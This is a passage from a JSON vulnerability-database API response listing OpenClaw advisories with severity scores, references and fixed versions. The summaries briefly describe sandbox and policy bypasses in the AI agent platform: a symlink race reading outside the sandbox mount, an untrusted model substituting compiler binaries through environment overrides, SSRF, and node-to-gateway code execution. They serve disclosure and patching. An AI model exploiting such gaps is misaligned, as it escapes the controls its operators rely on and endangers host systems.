"cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T16:02:24Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9q7v-8mr7-g23p" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41302", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41302" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-fetch-in-marketplace-plugin-download", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T16:02:24Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-fetch-in-marketplace-plugin-download" }, { "reference_url": "https://github.com/advisories/GHSA-9q7v-8mr7-g23p", "reference_id": "GHSA-9q7v-8mr7-g23p", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9q7v-8mr7-g23p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41302", "GHSA-9q7v-8mr7-g23p" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ykwt-tdpa-3bft" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92141?format=api", "vulnerability_id": "VCID-ymmv-2qmq-6kap", "summary": "OpenClaw: OpenShell FS bridge reads pin and verify the opened file before returning bytes\n## Summary\nOpenShell FS bridge reads pin and verify the opened file before returning bytes \n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA time-of-check/time-of-use race around OpenShell sandbox filesystem reads could let a symlink swap cause bytes outside the intended mount root to be read.\n\n## Fix\nOpenShell reads now open the file with no-follow semantics where available, validate the pinned file descriptor against the canonical mount root, reject unsafe hardlink/symlink cases, and use a strict fallback ancestor walk on platforms without fd-path readback.\n\n## Fix Commit(s)\n- 95119017c847c737bd113f0bff728c4666d79c45\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nThanks @VladimirEliTokarev for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44113", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09994", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09978", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11564", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44113" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/95119017c847c737bd113f0bff728c4666d79c45", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:04:19Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/95119017c847c737bd113f0bff728c4666d79c45" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3g-6xhh-rg6p", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:04:19Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3g-6xhh-rg6p" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44113", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44113" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-race-condition-in-openshell-fs-bridge", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:04:19Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-race-condition-in-openshell-fs-bridge" }, { "reference_url": "https://github.com/advisories/GHSA-5h3g-6xhh-rg6p", "reference_id": "GHSA-5h3g-6xhh-rg6p", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5h3g-6xhh-rg6p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api", "purl": "pkg:npm/openclaw@2026.4.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22" } ], "aliases": [ "CVE-2026-44113", "GHSA-5h3g-6xhh-rg6p" ], "risk_score": 3.8, "exploitability": "0.5", "weighted_severity": "7.5", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ymmv-2qmq-6kap" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89362?format=api", "vulnerability_id": "VCID-ynup-4v9e-tbh4", "summary": "OpenClaw: Incomplete host-env-security-policy allows untrusted model to substitute compiler binaries via env overrides\n## Summary\nIncomplete `host-env-security-policy.json` allows untrusted model to substitute compiler binaries (`CC`, `CXX`, `CARGO_BUILD_RUSTC`, `CMAKE_C_COMPILER`) via env overrides on approved host exec requests\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Shipped v2026.3.28 host-env policy missed compiler override vars, but exploitation still requires an approved host-exec request inside the existing exec trust domain, so medium not high.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `e277a37f896b5011a1df06e6490c6630074d0afa` — 2026-03-30T20:06:32+01:00\n\nOpenClaw thanks @tdjackey for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41373", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02541", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02487", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02543", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41373" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/e277a37f896b5011a1df06e6490c6630074d0afa", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/e277a37f896b5011a1df06e6490c6630074d0afa" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g8xp-qx39-9jq9", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g8xp-qx39-9jq9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41373", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41373" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-compiler-binary-substitution-via-environment-variable-override-in-host-execution-policy", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-compiler-binary-substitution-via-environment-variable-override-in-host-execution-policy" }, { "reference_url": "https://github.com/advisories/GHSA-g8xp-qx39-9jq9", "reference_id": "GHSA-g8xp-qx39-9jq9", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g8xp-qx39-9jq9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41373", "GHSA-g8xp-qx39-9jq9" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ynup-4v9e-tbh4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90041?format=api", "vulnerability_id": "VCID-yp2w-pc58-9bf6", "summary": "OpenClaw: Paired node escalates to gateway RCE via unrestricted node.event agent dispatch\n## Summary\nPaired node escalates to gateway RCE via unrestricted node.event agent dispatch\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets paired role=node clients drive node.event agent.request into broader gateway-side tool access than node RPCs, but critical is overstated because a trusted paired node foothold is already required.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a77928b1087e90f2a8903f8e5aca6dec9237ac62` — 2026-03-30T14:22:15+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41378", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00285", "scoring_system": "epss", "scoring_elements": "0.52312", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00285", "scoring_system": "epss", "scoring_elements": "0.52299", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00285", "scoring_system": "epss", "scoring_elements": "0.5232", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41378" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", 